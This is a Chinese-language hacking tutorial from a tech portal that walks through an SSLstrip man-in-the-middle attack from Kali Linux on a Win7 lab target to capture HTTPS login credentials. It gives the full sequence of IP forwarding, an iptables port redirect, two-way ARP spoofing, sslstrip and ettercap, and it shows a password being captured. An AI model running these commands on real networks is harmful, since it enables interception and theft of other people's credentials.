您当前的位置:首页 > 电脑百科 > 安全防护 > 软件工具

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

时间:2020-05-12 10:49:33  来源:  作者:

平时我们上网的过程中,经常会发现浏览器中的地址栏前面有个http或者https,这个是web请求时指定的协议。默认情况下,使用HTTP开头的,这个网站上的通信就不会被加密,也就是明文传输;如果是HTTPS,那么不仅加密了,而且攻击时还会在网页中提示证书风险提示,这样就会引起用户的疑心。本节课我们来学习下SSL原理和kali中的sslstrip攻击,你也能速度掌握这些黑客干货!

什么是SSL

SSL的作用是为了传输敏感信息(比如凭证、账号密码)提供安全可靠的保障,确保用户使用浏览器和远程服务器之间传输的数据是安全可信的,传输的数据不会被恶意窃取。

当我们访问一个HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并附带证书验证,在得到双方证书有效的前提下,从此两者开始进行SSL安全通信!传输的数据就得到了安全保障!

比如访问一个HTTPS类型的网页,登录个人账号,如果这个网页返回的证书验证没能和浏览器收录的证书匹配,就会弹出证书风险提示,假如进一步继续访问,你输入的用户和密码就不再安全,很有可能被窃取!

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

嗅探https登录密码

基本所有的HTTPS网页比如:https://www。baidu。com,都会采用ssl证书加密机制,这是为了用户的隐私安全不被攻击者明文窃取。上一节课我使用http网页直接能嗅探到用户登录网页的用户密码,如果是https网页,在不使用伪装欺骗技术的前提下,账号是无法窃取,而且还会提示证书风险提示。

那如何绕过ssl进行嗅探https网页提交的个人账号信息呢?

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

  • 嗅探原理:

使用SSL Strip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文传输通信,kali能够截获明文数据。而另一边kali进行路由转发,和win7原本要连接的服务器进行正常的https通信!

攻击主机:kali主机 192.168.31.251,进入su root用户下操作!

靶机:Win7 192.168.31.16

网络环境:桥接网络

工具sslstrip:kali2020是没有默认安装的,需要自行安装

如何在kali中安装sslstrip,可以点击>>《白帽黑客kali渗透指南》前往专栏课程学习,视频实战指导更加完整详细,小白入门到实战轻轻松松!

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

 

  • 开启kali的路由转发,终端下输入:
echo 1 > /proc/sys/net/ipv4/ip_forward

意思是往ip_forward文件写入数值1,开启路由转发!

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

  • 开启iptables规则

主要作用就是在kali中实现把从win7靶机截获的HTTP流量转发到SSLstrip中,并在10000端口上运行SSLstrip,实现和win7原来要访问的远程服务器建立ssl(https)通信!

在kali下新建终端,输入:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  • 在kali中开启ARP欺骗

在终端下输入:

arpspoof -i eth0(网卡) -t 192.168.31.16(目标IP) 192.168.31.1(网关)
kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

在新的终端下输入:

arpspoof -i eth0(网卡) -t 192.168.31.1(网关) 192.168.31.16(目标)
kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

如果你已经安装了sslstrip,那么看下面实战!

  • Kali中开启sslstrip攻击

新建终端,输入:

sslstrip -a -f -k

此时已经成功开启了sslstrip攻击,就会自动将https ssl加密转换为http明文形式。

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

为了使用直白的形式在终端中打印嗅探捕获到的用户账号和密码,可以开启ettercap捕获。

新建终端,输入:

ettercap -Tq -i eth0

如图,等待对方在https网页中输入用户名和密码!

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

  • 模拟win7靶机在https网页中输入个人账号!

A、这里在win7靶机中模拟上网(请直接在浏览器中访问jikejia. cn)

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 


kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

你会发现,成功截获了账号和密码!

清除防火墙规则(不要忘了!)

iptables -t nat -L (查询当前防火墙规则)

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

iptables -t nat -D PREROUTING 1(删除当前防火墙规则)

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 

iptables -t nat -L (再次查询当前防火墙规则)

kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势

 



Tags:SSLstrip   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
平时我们上网的过程中,经常会发现浏览器中的地址栏前面有个http或者https,这个是web请求时指定的协议。默认情况下,使用HTTP开头的,这个网站上的通信就不会被加密,也就是明文传输...【详细内容】
2020-05-12  Tags: SSLstrip  点击:(2833)  评论:(0)  加入收藏
▌简易百科推荐
已经观察到一种新的基于JavaScript的远程访问木马(RAT)利用社会工程学传播,采用隐蔽的"无文件"技术作为其逃避检测和分析的方法。该恶意软件由Prevalyion的对抗性反情报团队(PA...【详细内容】
2021-12-17  网安老葫    Tags:恶意软件   点击:(13)  评论:(0)  加入收藏
关于windows Defender防病毒的问题升级win10后,我们会经常遇到打开或下载文件时弹出提示框提示你下载的文件是病毒之类,直接给你删除。你好不容易找了个激活工具,你刚打开发现...【详细内容】
2021-11-08  IT小哥吧    Tags:defender   点击:(47)  评论:(0)  加入收藏
喽!大家好,我是小易,欢迎来到我的知识分享站!今天给大家分享5个杀毒神器,让你的电脑干干净净,建议收藏起来哟! 1、Windows Defender随着Win10系统的更新已经日趋完善,它可以很好的解...【详细内容】
2021-11-08  知识与技能    Tags:流氓软件   点击:(74)  评论:(0)  加入收藏
介绍其实Iptables服务不是真正的防火墙,只是用来定义防火墙规则功能的"防火墙管理工具",将定义好的规则交由内核中的netfilter即网络过滤器来读取,从而真正实现防火墙功能。fil...【详细内容】
2021-10-18  互联网IT技术全栈    Tags:   点击:(52)  评论:(0)  加入收藏
什么是Nessus?Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件步骤如下:查看当前kali系统内核版本...【详细内容】
2021-09-09  TestGO    Tags:Nessus   点击:(112)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  80后IT老民工    Tags:渗透   点击:(227)  评论:(0)  加入收藏
一、杀软常见的三种方式二、免杀的三种常用方式三、利用工具实现免杀1、veil工具基础实现免杀+进阶2、venom免杀3、利用kali自带的shellter进行免杀4、利用avet实现免杀四、...【详细内容】
2021-08-18  白帽hacker淬炼    Tags:免杀   点击:(82)  评论:(0)  加入收藏
关于工具现有工具现在,现成的污点分析工具已经有很多了。其中,我最感兴趣的是Triton和bincat,因为两者已经相当成熟。然而,我们却无法使用这两种工具,因为它们不支持目标设备所...【详细内容】
2021-08-12  Hbo涵    Tags:安全漏洞   点击:(94)  评论:(0)  加入收藏
从实现原理上分,防火墙的技术包括四大类:网络级防火墙、应用级网关、电路级网关和规则检查防火墙。1、网络级防火墙一般是基于源地址和目的地址、应用、协议以及每个IP包的端...【详细内容】
2021-07-20  趣谈文化  搜狐号  Tags:防火墙   点击:(225)  评论:(0)  加入收藏
一、VMware部分1、Vmware简介虚拟机就是一个用来模拟真实的物理机环境的一个软件,可以在虚拟机中安装不同版本的操作系统。就是一个把下载好的ISO安装在物理机操作系统的一个...【详细内容】
2021-07-12  Kali与编程  公众号  Tags:Kali Linux   点击:(113)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条